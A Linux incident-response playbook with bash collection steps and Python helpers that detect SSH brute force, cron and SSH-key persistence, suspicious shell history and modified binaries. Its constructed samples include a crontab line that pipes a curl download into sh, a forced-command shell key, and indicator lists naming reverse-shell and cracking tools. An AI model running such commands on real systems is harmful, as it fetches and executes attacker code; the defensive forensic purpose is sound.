
Analyzing Linux System Artifacts

When to Use

  • When investigating a compromised Linux server or workstation
  • For identifying persistence mechanisms (cron, systemd, SSH keys)
  • When tracing user activity through shell history and authentication logs
  • During incident response to determine the scope of a Linux-based breach
  • For detecting rootkits, backdoors, and unauthorized modifications

Prerequisites

  • Forensic image or live access to the Linux system (read-only)
  • Understanding of Linux file system hierarchy (FHS)
  • Knowledge of common Linux logging locations (/var/log/)
  • Tools: chkrootkit, rkhunter, AIDE, auditd logs
  • Familiarity with systemd, cron, and PAM configurations
  • Root access for complete artifact collection

Workflow

Step 1: Mount and Collect System Artifacts

```bash
# Mount forensic image read-only (offset = partition start sector * sector size;
# take the start sector from `fdisk -l` or `mmls` run against the image)
mount -o ro,loop,offset=$((2048*512)) /cases/case-2024-001/images/linux_evidence.dd /mnt/evidence

# Create collection directories (analysis/ receives the output of later steps)
mkdir -p /cases/case-2024-001/linux/{logs,config,users,persistence,network,analysis}

# Collect authentication logs; cp -p preserves timestamps for later timeline work
# (Debian/Ubuntu: auth.log, syslog; RHEL/CentOS: secure)
cp -p /mnt/evidence/var/log/auth.log* /cases/case-2024-001/linux/logs/
cp -p /mnt/evidence/var/log/secure* /cases/case-2024-001/linux/logs/
cp -p /mnt/evidence/var/log/syslog* /cases/case-2024-001/linux/logs/
cp -p /mnt/evidence/var/log/kern.log* /cases/case-2024-001/linux/logs/
cp -p /mnt/evidence/var/log/audit/audit.log* /cases/case-2024-001/linux/logs/
cp -p /mnt/evidence/var/log/wtmp /cases/case-2024-001/linux/logs/
cp -p /mnt/evidence/var/log/btmp /cases/case-2024-001/linux/logs/
cp -p /mnt/evidence/var/log/lastlog /cases/case-2024-001/linux/logs/
cp -p /mnt/evidence/var/log/faillog /cases/case-2024-001/linux/logs/

# Collect user artifacts
for user_dir in /mnt/evidence/home/*/; do
    username=$(basename "$user_dir")
    mkdir -p "/cases/case-2024-001/linux/users/$username"
    cp -p "$user_dir"/.bash_history "/cases/case-2024-001/linux/users/$username/" 2>/dev/null
    cp -p "$user_dir"/.zsh_history "/cases/case-2024-001/linux/users/$username/" 2>/dev/null
    cp -rp "$user_dir"/.ssh/ "/cases/case-2024-001/linux/users/$username/" 2>/dev/null
    cp -p "$user_dir"/.bashrc "/cases/case-2024-001/linux/users/$username/" 2>/dev/null
    cp -p "$user_dir"/.profile "/cases/case-2024-001/linux/users/$username/" 2>/dev/null
    cp -p "$user_dir"/.viminfo "/cases/case-2024-001/linux/users/$username/" 2>/dev/null
    cp -p "$user_dir"/.wget-hsts "/cases/case-2024-001/linux/users/$username/" 2>/dev/null
    cp -p "$user_dir"/.python_history "/cases/case-2024-001/linux/users/$username/" 2>/dev/null
done

# Collect root user artifacts (root's home is /root, outside /home, so it needs its own directory)
mkdir -p /cases/case-2024-001/linux/users/root
cp -p /mnt/evidence/root/.bash_history /cases/case-2024-001/linux/users/root/ 2>/dev/null
cp -rp /mnt/evidence/root/.ssh/ /cases/case-2024-001/linux/users/root/ 2>/dev/null

# Collect system configuration
cp -p /mnt/evidence/etc/passwd /cases/case-2024-001/linux/config/
cp -p /mnt/evidence/etc/shadow /cases/case-2024-001/linux/config/
cp -p /mnt/evidence/etc/group /cases/case-2024-001/linux/config/
cp -p /mnt/evidence/etc/sudoers /cases/case-2024-001/linux/config/
cp -rp /mnt/evidence/etc/sudoers.d/ /cases/case-2024-001/linux/config/
cp -p /mnt/evidence/etc/hosts /cases/case-2024-001/linux/config/
cp -p /mnt/evidence/etc/resolv.conf /cases/case-2024-001/linux/config/
cp -rp /mnt/evidence/etc/ssh/ /cases/case-2024-001/linux/config/
```

Step 2: Analyze User Accounts and Authentication

```bash
# Analyze user accounts for anomalies
python3 << 'PYEOF'
print("=== USER ACCOUNT ANALYSIS ===\n")

# Parse /etc/passwd
with open('/cases/case-2024-001/linux/config/passwd') as f:
    for line in f:
        parts = line.strip().split(':')
        if len(parts) >= 7:
            username, _, uid, gid, comment, home, shell = (
                parts[0], parts[1], int(parts[2]), int(parts[3]), parts[4], parts[5], parts[6])

            # Flag accounts with UID 0 (root equivalent)
            if uid == 0 and username != 'root':
                print(f"  ALERT: UID 0 account: {username} (shell: {shell})")

            # List regular users that have an interactive login shell
            if shell not in ('/bin/false', '/usr/sbin/nologin', '/bin/sync') and uid >= 1000:
                print(f"  User: {username} (UID:{uid}, Shell:{shell}, Home:{home})")

            # Flag system accounts with login shells
            if 0 < uid < 1000 and shell in ('/bin/bash', '/bin/sh', '/bin/zsh'):
                print(f"  WARNING: System account with shell: {username} (UID:{uid}, Shell:{shell})")

# Parse /etc/shadow for account status
print("\n=== PASSWORD STATUS ===")
with open('/cases/case-2024-001/linux/config/shadow') as f:
    for line in f:
        parts = line.strip().split(':')
        if len(parts) >= 3:
            username = parts[0]
            pwd_hash = parts[1]
            last_change = parts[2]
            # '*' and '!'/'!!' mean no password or a locked account; a locked hash
            # is written as '!' followed by the original hash, so skip both forms
            if pwd_hash and not pwd_hash.startswith(('*', '!')):
                hash_type = 'Unknown'
                if pwd_hash.startswith('$6$'): hash_type = 'SHA-512'
                elif pwd_hash.startswith('$5$'): hash_type = 'SHA-256'
                elif pwd_hash.startswith('$y$'): hash_type = 'yescrypt'
                elif pwd_hash.startswith('$1$'): hash_type = 'MD5 (WEAK)'
                print(f"  {username}: {hash_type} hash, last changed: day {last_change} (days since 1970-01-01)")
PYEOF

# Analyze login history (wtmp = sessions, btmp = failed logins)
last -f /cases/case-2024-001/linux/logs/wtmp > /cases/case-2024-001/linux/analysis/login_history.txt
lastb -f /cases/case-2024-001/linux/logs/btmp > /cases/case-2024-001/linux/analysis/failed_logins.txt 2>/dev/null
```
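The failed-login counts above come from btmp, but the pattern that matters most in Scenario 1 (a burst of failures from one source followed by an accepted login from the same source) is easiest to see in auth.log itself. The following added example, which is not part of the original playbook, parses OpenSSH `Failed`/`Accepted` lines, groups them by source IP and reports sources whose failure count reached a threshold before a success. The log lines, hostname, usernames and TEST-NET addresses are constructed for the demonstration.

```python
"""Detect SSH brute-force attempts that end in a successful login.

Added example (not part of the original playbook). Scans OpenSSH auth.log
lines for Failed/Accepted events in file order and reports any source IP
whose failures reached a threshold before an accepted login. The sample
log below is constructed: hostname, users and IPs are made up.
"""
import re
from collections import defaultdict

# Matches "Failed password for invalid user X from IP" as well as "Failed password for X from IP"
FAILED_RE = re.compile(
    r"sshd\[\d+\]: Failed (?:password|publickey) for (?:invalid user )?(\S+) from (\d+\.\d+\.\d+\.\d+)")
ACCEPTED_RE = re.compile(
    r"sshd\[\d+\]: Accepted (?:password|publickey) for (\S+) from (\d+\.\d+\.\d+\.\d+)")

SAMPLE_AUTH_LOG = """\
Jan 15 03:12:01 webserver01 sshd[2101]: Failed password for invalid user admin from 203.0.113.45 port 51234 ssh2
Jan 15 03:12:03 webserver01 sshd[2103]: Failed password for invalid user oracle from 203.0.113.45 port 51236 ssh2
Jan 15 03:12:05 webserver01 sshd[2105]: Failed password for root from 203.0.113.45 port 51238 ssh2
Jan 15 03:12:07 webserver01 sshd[2107]: Failed password for deploy from 203.0.113.45 port 51240 ssh2
Jan 15 03:12:09 webserver01 sshd[2109]: Failed password for deploy from 203.0.113.45 port 51242 ssh2
Jan 15 03:12:11 webserver01 sshd[2111]: Accepted password for deploy from 203.0.113.45 port 51244 ssh2
Jan 15 08:30:00 webserver01 sshd[2300]: Failed password for alice from 198.51.100.7 port 40001 ssh2
Jan 15 08:30:05 webserver01 sshd[2302]: Accepted publickey for alice from 198.51.100.7 port 40003 ssh2
Jan 15 09:00:00 webserver01 sshd[2400]: Accepted publickey for bob from 198.51.100.9 port 40010 ssh2
"""


def parse_ssh_events(lines):
    """Yield (outcome, user, ip) for each sshd authentication line; other lines are skipped."""
    for line in lines:
        m = FAILED_RE.search(line)
        if m:
            yield ("failed", m.group(1), m.group(2))
            continue
        m = ACCEPTED_RE.search(line)
        if m:
            yield ("accepted", m.group(1), m.group(2))


def find_bruteforce_successes(lines, threshold=5):
    """Return findings for IPs with >= threshold failures immediately before an accepted login.

    Events are processed in file order, so only failures preceding the success count.
    The counter resets after each success so a later compromise from the same IP
    is reported separately.
    """
    failures = defaultdict(int)   # ip -> failures since the last success from that ip
    targeted = defaultdict(set)   # ip -> usernames tried during that run
    findings = []
    for outcome, user, ip in parse_ssh_events(lines):
        if outcome == "failed":
            failures[ip] += 1
            targeted[ip].add(user)
            continue
        if failures[ip] >= threshold:
            findings.append({
                "ip": ip,
                "failures_before_success": failures[ip],
                "usernames_tried": sorted(targeted[ip]),
                "compromised_user": user,
            })
        failures[ip] = 0
        targeted[ip] = set()
    return findings


def top_failure_sources(lines, n=5):
    """Failed logins per source IP, most active first (the 'from N unique IPs' figure in the summary)."""
    counts = defaultdict(int)
    for outcome, _user, ip in parse_ssh_events(lines):
        if outcome == "failed":
            counts[ip] += 1
    return sorted(counts.items(), key=lambda kv: kv[1], reverse=True)[:n]


if __name__ == "__main__":
    lines = SAMPLE_AUTH_LOG.splitlines()
    for f in find_bruteforce_successes(lines):
        print(f"ALERT: {f['ip']} failed {f['failures_before_success']} times "
              f"(tried {', '.join(f['usernames_tried'])}) then logged in as {f['compromised_user']}")
    print("Top failure sources:", top_failure_sources(lines))
```

To run it over the collected log, read `/cases/case-2024-001/linux/logs/auth.log` (or `secure` on RHEL) line by line in place of `SAMPLE_AUTH_LOG`. The threshold is deliberately low for the sample; on a server exposed to the internet a single IP typically accumulates thousands of failures, so the signal to look for is the transition from failures to an `Accepted` line, not the raw count.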

Step 3: Examine Persistence Mechanisms

```bash
# Check cron jobs for all users
echo "=== CRON JOBS ===" > /cases/case-2024-001/linux/persistence/cron_analysis.txt

# System cron
for cronfile in /mnt/evidence/etc/crontab /mnt/evidence/etc/cron.d/*; do
    echo "--- $cronfile ---" >> /cases/case-2024-001/linux/persistence/cron_analysis.txt
    cat "$cronfile" 2>/dev/null >> /cases/case-2024-001/linux/persistence/cron_analysis.txt
    echo "" >> /cases/case-2024-001/linux/persistence/cron_analysis.txt
done

# User crontabs (Debian/Ubuntu keep them under crontabs/, RHEL directly under /var/spool/cron/)
for cronfile in /mnt/evidence/var/spool/cron/crontabs/* /mnt/evidence/var/spool/cron/*; do
    [ -f "$cronfile" ] || continue
    echo "--- User crontab: $(basename "$cronfile") ---" >> /cases/case-2024-001/linux/persistence/cron_analysis.txt
    cat "$cronfile" 2>/dev/null >> /cases/case-2024-001/linux/persistence/cron_analysis.txt
    echo "" >> /cases/case-2024-001/linux/persistence/cron_analysis.txt
done

# Check systemd services for persistence: first list units newer than /etc/os-release,
# then dump every unit in /etc/systemd/system/
echo "=== SYSTEMD SERVICES ===" > /cases/case-2024-001/linux/persistence/systemd_analysis.txt
find /mnt/evidence/etc/systemd/system/ -name "*.service" -newer /mnt/evidence/etc/os-release \
    >> /cases/case-2024-001/linux/persistence/systemd_analysis.txt
for svc in /mnt/evidence/etc/systemd/system/*.service; do
    echo "--- $(basename "$svc") ---" >> /cases/case-2024-001/linux/persistence/systemd_analysis.txt
    cat "$svc" >> /cases/case-2024-001/linux/persistence/systemd_analysis.txt
    echo "" >> /cases/case-2024-001/linux/persistence/systemd_analysis.txt
done

# Check authorized SSH keys (backdoor detection); the path is passed to sh as $1
# rather than substituted into the script, and -exec needs the terminating \;
echo "=== SSH AUTHORIZED KEYS ===" > /cases/case-2024-001/linux/persistence/ssh_keys.txt
find /mnt/evidence/home/ /mnt/evidence/root/ -name "authorized_keys" \
    -exec sh -c 'echo "--- $1 ---"; cat "$1"; echo ""' sh {} \; >> /cases/case-2024-001/linux/persistence/ssh_keys.txt

# Check rc.local and init scripts
cat /mnt/evidence/etc/rc.local 2>/dev/null > /cases/case-2024-001/linux/persistence/rc_local.txt

# Check /etc/profile.d/ for login-triggered scripts
ls -la /mnt/evidence/etc/profile.d/ > /cases/case-2024-001/linux/persistence/profile_scripts.txt

# Check for LD_PRELOAD hijacking (an /etc/ld.so.preload file is rarely legitimate)
grep -r "LD_PRELOAD" /mnt/evidence/etc/ 2>/dev/null > /cases/case-2024-001/linux/persistence/ld_preload.txt
cat /mnt/evidence/etc/ld.so.preload 2>/dev/null >> /cases/case-2024-001/linux/persistence/ld_preload.txt
```
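The commands above only dump the raw cron and `authorized_keys` content; the analyst still has to read every line. The following added example, not part of the original playbook, shows the triage an investigator applies to that output: it parses system and per-user crontab syntax (the system form carries a user field that the spool form lacks), flags scheduled commands by the same kind of indicators the playbook uses for shell history, and checks each SSH public key against an allowlist of fingerprints, also calling out keys that carry options such as a forced command. The crontab text, key blobs and allowlist are all constructed for the demonstration.

```python
"""Triage collected cron entries and authorized_keys for persistence indicators.

Added example, not part of the original playbook. It works on the text that
Step 3 writes out (cron_analysis.txt, ssh_keys.txt). The crontab and key samples
below are constructed, and the 'known good' fingerprint allowlist is a made-up
stand-in for one an investigator would build from change records.
"""
import base64
import hashlib

# Command fragments that warrant analyst attention in a scheduled task
CRON_INDICATORS = (
    "/tmp/", "/dev/shm/", "/dev/tcp/", "curl ", "wget ", "| sh", "|sh", "| bash", "|bash",
    "base64 -d", "base64 --decode", "python -c", "python3 -c", "perl -e", "nc ",
)
KEY_TYPES = ("ssh-ed25519", "ssh-rsa", "ecdsa-sha2-nistp256", "ecdsa-sha2-nistp384",
             "ecdsa-sha2-nistp521", "ssh-dss")


def parse_crontab(text, system_crontab):
    """Return (schedule, user, command) tuples from crontab text.

    System crontabs (/etc/crontab, /etc/cron.d/*) have a user field after the five
    schedule fields; per-user spool files do not. @reboot-style shortcuts are one token.
    """
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue  # blank line, comment, or VAR=value assignment
        fields = line.split()
        n_sched = 1 if fields[0].startswith("@") else 5
        schedule, rest = " ".join(fields[:n_sched]), fields[n_sched:]
        user = None
        if system_crontab and rest:
            user, rest = rest[0], rest[1:]
        if rest:
            entries.append((schedule, user, " ".join(rest)))
    return entries


def flag_cron_entries(entries):
    """Return entries whose command contains any CRON_INDICATORS fragment, with the hits."""
    flagged = []
    for schedule, user, command in entries:
        hits = [ind for ind in CRON_INDICATORS if ind in command]
        if hits:
            flagged.append({"schedule": schedule, "user": user, "command": command, "indicators": hits})
    return flagged


def ssh_key_fingerprint(blob_b64):
    """OpenSSH SHA256 fingerprint: base64(sha256(decoded key blob)) without '=' padding."""
    digest = hashlib.sha256(base64.b64decode(blob_b64)).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def parse_authorized_keys(text):
    """Yield {options, type, blob, comment} per key line; options may precede the key type."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        for ktype in KEY_TYPES:
            idx = line.find(ktype + " ")
            if idx != -1:
                break
        else:
            continue  # no recognised key type on this line
        parts = line[idx:].split(None, 2)
        yield {"options": line[:idx].strip(), "type": parts[0], "blob": parts[1],
               "comment": parts[2] if len(parts) > 2 else ""}


def flag_authorized_keys(text, known_fingerprints):
    """Report keys not on the allowlist, and keys carrying options (forced commands etc.)."""
    findings = []
    for key in parse_authorized_keys(text):
        fp = ssh_key_fingerprint(key["blob"])
        reasons = []
        if fp not in known_fingerprints:
            reasons.append("fingerprint not in allowlist")
        if key["options"]:
            reasons.append("key options present: " + key["options"])
        if reasons:
            findings.append({"fingerprint": fp, "type": key["type"],
                             "comment": key["comment"], "reasons": reasons})
    return findings


# Constructed samples (not taken from any real system)
SAMPLE_SYSTEM_CRONTAB = """\
SHELL=/bin/sh
17 *\t* * *\troot    cd / && run-parts --report /etc/cron.hourly
*/5 * * * * root /dev/shm/.cache/update >/dev/null 2>&1
@reboot root curl -s http://203.0.113.9/x.sh | sh
"""
SAMPLE_USER_CRONTAB = "0 2 * * * /usr/bin/certbot renew --quiet\n"


def _blob(label):
    """Stand-in for a real public key blob: any base64 string fingerprints the same way."""
    return base64.b64encode(label.encode()).decode()


SAMPLE_AUTHORIZED_KEYS = (
    f"ssh-ed25519 {_blob('constructed-key-alice')} alice@laptop\n"
    f"ssh-rsa {_blob('constructed-key-unknown')} user@unknown-host\n"
    f'command="/bin/sh",no-pty ssh-ed25519 {_blob("constructed-key-alice")} alice@laptop\n'
)
KNOWN_FINGERPRINTS = {ssh_key_fingerprint(_blob("constructed-key-alice"))}

if __name__ == "__main__":
    for hit in flag_cron_entries(parse_crontab(SAMPLE_SYSTEM_CRONTAB, system_crontab=True)):
        print(f"CRON {hit['schedule']} {hit['user']}: {hit['command']}  <- {hit['indicators']}")
    for hit in flag_authorized_keys(SAMPLE_AUTHORIZED_KEYS, KNOWN_FINGERPRINTS):
        print(f"KEY  {hit['fingerprint']} ({hit['comment']}): {'; '.join(hit['reasons'])}")
```

The fingerprint allowlist is the important design choice: comparing whole key strings is fragile because the comment field is free text, while the SHA256 fingerprint is what `ssh-keygen -lf` prints and what administrators record, so an investigator can match collected keys against change tickets without handling raw key material. A key that is allowlisted but carries options is still reported, since a `command=` option on a previously plain key is itself a change worth explaining.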

Step 4: Analyze Shell History and Command Execution

```bash
# Analyze bash history for each user (note: .bash_history carries no timestamps
# unless HISTTIMEFORMAT was set, and an attacker may have truncated it)
python3 << 'PYEOF'
import glob

print("=== SHELL HISTORY ANALYSIS ===\n")
suspicious_commands = [
    'wget', 'curl', 'nc ', 'ncat', 'netcat', 'python -c', 'python3 -c', 'perl -e',
    'base64', 'chmod 777', 'chmod +s', '/dev/tcp', '/dev/udp', 'nmap', 'masscan',
    'hydra', 'john', 'hashcat', 'passwd', 'useradd', 'iptables -F', 'ufw disable',
    'history -c', 'rm -rf /', 'dd if=', 'crontab', 'at ', 'systemctl enable',
    'ssh-keygen', 'scp ', 'rsync', 'tar czf', 'zip -r', 'openssl enc', 'gpg --encrypt',
    'shred', 'chattr', 'setfacl', 'awk', '/tmp/', '/dev/shm/'
]

# Step 1 also collected .zsh_history, so scan both; the same substring match works
# on zsh's extended-history lines (": <epoch>:0;<command>")
hist_files = (glob.glob('/cases/case-2024-001/linux/users/*/.bash_history')
              + glob.glob('/cases/case-2024-001/linux/users/*/.zsh_history'))

for hist_file in sorted(hist_files):
    username = hist_file.split('/')[-2]
    print(f"User: {username} ({hist_file.split('/')[-1]})")
    with open(hist_file, 'r', errors='ignore') as f:
        lines = f.readlines()

    print(f"  Total commands: {len(lines)}")
    flagged = []
    for i, line in enumerate(lines):
        line = line.strip()
        for cmd in suspicious_commands:
            if cmd in line.lower():
                flagged.append((i + 1, line))
                break

    if flagged:
        print(f"  Suspicious commands: {len(flagged)}")
        for lineno, cmd in flagged:
            print(f"    Line {lineno}: {cmd[:120]}")
    print()
PYEOF
```

Step 5: Check for Rootkits and Modified Binaries

```bash
# Check for known rootkit indicators

# Compare system binary hashes against known-good (-exec ... + batches paths into few sha256sum calls)
find /mnt/evidence/usr/bin/ /mnt/evidence/usr/sbin/ /mnt/evidence/bin/ /mnt/evidence/sbin/ \
    -type f -executable -exec sha256sum {} + > /cases/case-2024-001/linux/analysis/binary_hashes.txt

# Check for SUID/SGID binaries (potential privilege escalation)
find /mnt/evidence/ -perm -4000 -type f 2>/dev/null > /cases/case-2024-001/linux/analysis/suid_files.txt
find /mnt/evidence/ -perm -2000 -type f 2>/dev/null > /cases/case-2024-001/linux/analysis/sgid_files.txt

# Check for suspicious files in /tmp and /dev/shm (file(1) identifies ELF binaries and scripts)
find /mnt/evidence/tmp/ /mnt/evidence/dev/shm/ -type f \
    -exec file {} \; > /cases/case-2024-001/linux/analysis/tmp_files.txt 2>/dev/null

# Check for hidden files and directories (names beginning with a dot)
find /mnt/evidence/ -name ".*" -type f 2>/dev/null | \
    head -100 > /cases/case-2024-001/linux/analysis/hidden_files.txt

# Check kernel modules (out-of-tree modules land in extra/)
ls -la /mnt/evidence/lib/modules/$(ls /mnt/evidence/lib/modules/ | head -1)/extra/ 2>/dev/null \
    > /cases/case-2024-001/linux/analysis/extra_modules.txt

# Check for modified PAM configuration (authentication backdoors) against a clean baseline
diff -r /mnt/evidence/etc/pam.d/ /cases/baseline/pam.d/ 2>/dev/null \
    > /cases/case-2024-001/linux/analysis/pam_changes.txt
```
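The hash list produced above is only useful once it is compared against a known-good manifest, and the two files do not line up directly because every evidence path carries the `/mnt/evidence` mount prefix. The following added example, not part of the original playbook, parses `sha256sum` output from both sides, strips the prefix, reports modified, added and missing binaries, and pulls out mismatches on binaries that userland rootkits commonly replace so they are reviewed first. Both manifests and all digests are constructed placeholders.

```python
"""Compare collected binary hashes against a known-good baseline.

Added example, not part of the original playbook. It reads sha256sum output
of the kind Step 5 writes to binary_hashes.txt; the evidence manifest carries
the /mnt/evidence mount prefix, which is stripped so paths match a baseline
taken from a clean install of the same distribution release and package set.
Both manifests below are constructed and the digests are placeholder hex.
"""

# Binaries userland rootkits commonly replace; a mismatch here is triaged first
HIGH_VALUE_BINARIES = {
    "/usr/bin/ls", "/usr/bin/ps", "/usr/bin/netstat", "/usr/bin/ss", "/usr/bin/lsof",
    "/usr/bin/find", "/usr/bin/top", "/usr/bin/du", "/usr/bin/login", "/usr/sbin/sshd",
}


def parse_sha256sum(text, strip_prefix=""):
    """Parse 'DIGEST  PATH' lines (sha256sum text mode, two-space separator) into {path: digest}."""
    manifest = {}
    for raw in text.splitlines():
        digest, sep, path = raw.partition("  ")
        if not sep or not digest.strip():
            continue  # blank or not a sha256sum line
        if strip_prefix and path.startswith(strip_prefix):
            path = path[len(strip_prefix):]
        manifest[path] = digest.strip().lower()
    return manifest


def compare_manifests(baseline, evidence):
    """Classify paths as modified (digest differs), added (absent from baseline) or missing."""
    return {
        "modified": sorted(p for p, h in evidence.items() if p in baseline and baseline[p] != h),
        "added": sorted(p for p in evidence if p not in baseline),
        "missing": sorted(p for p in baseline if p not in evidence),
    }


def prioritise(result):
    """Modified binaries that sit on the rootkit watchlist, for first review."""
    return [p for p in result["modified"] if p in HIGH_VALUE_BINARIES]


# Constructed manifests: the digests are placeholders, not hashes of real files
SAMPLE_BASELINE = """\
aaaa0001  /usr/bin/ls
aaaa0002  /usr/bin/ps
aaaa0003  /usr/bin/netstat
aaaa0004  /usr/sbin/sshd
"""
SAMPLE_EVIDENCE = """\
aaaa0001  /mnt/evidence/usr/bin/ls
bbbb0002  /mnt/evidence/usr/bin/ps
aaaa0004  /mnt/evidence/usr/sbin/sshd
cccc0005  /mnt/evidence/usr/bin/.x
"""

if __name__ == "__main__":
    baseline = parse_sha256sum(SAMPLE_BASELINE)
    evidence = parse_sha256sum(SAMPLE_EVIDENCE, strip_prefix="/mnt/evidence")
    result = compare_manifests(baseline, evidence)
    for kind in ("modified", "added", "missing"):
        for path in result[kind]:
            print(f"{kind.upper():9} {path}")
    print("Review first:", prioritise(result))
```

For the case, the baseline manifest should be generated on a clean install of the same release with the same package versions; otherwise routine package updates appear as modifications. Where that is not available, the package manager's own verification (`dpkg -V` on Debian/Ubuntu, `rpm -Va` on RHEL) run against the image's package database is a useful cross-check, keeping in mind that a rootkit with root access can also tamper with that database.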

Key Concepts

| Concept | Description |
|---|---|
| /var/log/auth.log | Primary authentication log on Debian/Ubuntu systems |
| /var/log/secure | Primary authentication log on RHEL/CentOS systems |
| wtmp/btmp | Binary logs recording successful and failed login sessions |
| .bash_history | User command history file (can be cleared by attackers) |
| crontab | Scheduled task system commonly used for persistence |
| authorized_keys | SSH public keys granting passwordless access to an account |
| SUID bit | File permission allowing execution as the file owner (privilege escalation vector) |
| LD_PRELOAD | Environment variable that loads a shared library before all others (hooking technique) |

Tools & Systems

| Tool | Purpose |
|---|---|
| chkrootkit | Rootkit detection scanner for Linux systems |
| rkhunter | Rootkit Hunter: checks for rootkits, backdoors, and local exploits |
| AIDE | Advanced Intrusion Detection Environment: file integrity monitor |
| auditd | Linux audit framework for system call and file access monitoring |
| last/lastb | Parse wtmp/btmp for login and failed login history |
| Plaso/log2timeline | Super-timeline creation including Linux artifacts |
| osquery | SQL-based system querying for live forensic investigation |
| Velociraptor | Endpoint agent with Linux artifact collection capabilities |

Common Scenarios

Scenario 1: SSH Brute Force Followed by Compromise
Analyze auth.log for failed SSH attempts followed by success, identify the attacking IP, check .bash_history for post-compromise commands, examine authorized_keys for added backdoor keys, check crontab for persistence, review network connections.

Scenario 2: Web Server Compromise via Application Vulnerability
Examine web server access and error logs for exploitation attempts, check /tmp and /dev/shm for webshells, analyze the web server user's activity (www-data), check for privilege escalation via SUID binaries or kernel exploits, review outbound connections.

Scenario 3: Insider Threat on Database Server
Analyze the suspect user's bash_history for database dump commands, check for large tar/zip files in the home directory or /tmp, examine scp/rsync commands for data transfer, review cron jobs for automated exfiltration, check USB device logs.

Scenario 4: Crypto-Miner on Cloud Instance
Check for high-CPU processes in /proc (live) or systemd service files, examine crontab entries for miner restart scripts, check /tmp for mining binaries, analyze network connections for mining pool communications, review authorized_keys for attacker access.

Output Format

Linux Forensics Summary:
  System: webserver01 (Ubuntu 22.04 LTS)
  Hostname: webserver01.corp.local
  Kernel: 5.15.0-91-generic

  User Accounts:
    Total: 25 (3 with UID 0 - 1 ANOMALOUS)
    Interactive shells: 8 users
    Recently created: admin2 (created 2024-01-15)

  Authentication Events:
    Successful SSH logins: 456
    Failed SSH attempts: 12,345 (from 23 unique IPs)
    Sudo executions: 89

  Persistence Mechanisms Found:
    Cron jobs: 3 suspicious (reverse shell, miner restart)
    Systemd services: 1 unknown (update-checker.service)
    SSH keys: 2 unauthorized keys in root authorized_keys
    rc.local: Modified with download cradle

  Suspicious Activity:
    - bash_history contains wget to pastebin URL
    - SUID binary /tmp/.hidden/escalate found
    - /dev/shm/ contains compiled ELF binary
    - LD_PRELOAD in /etc/ld.so.preload pointing to /lib/.hidden.so

  Report: /cases/case-2024-001/linux/analysis/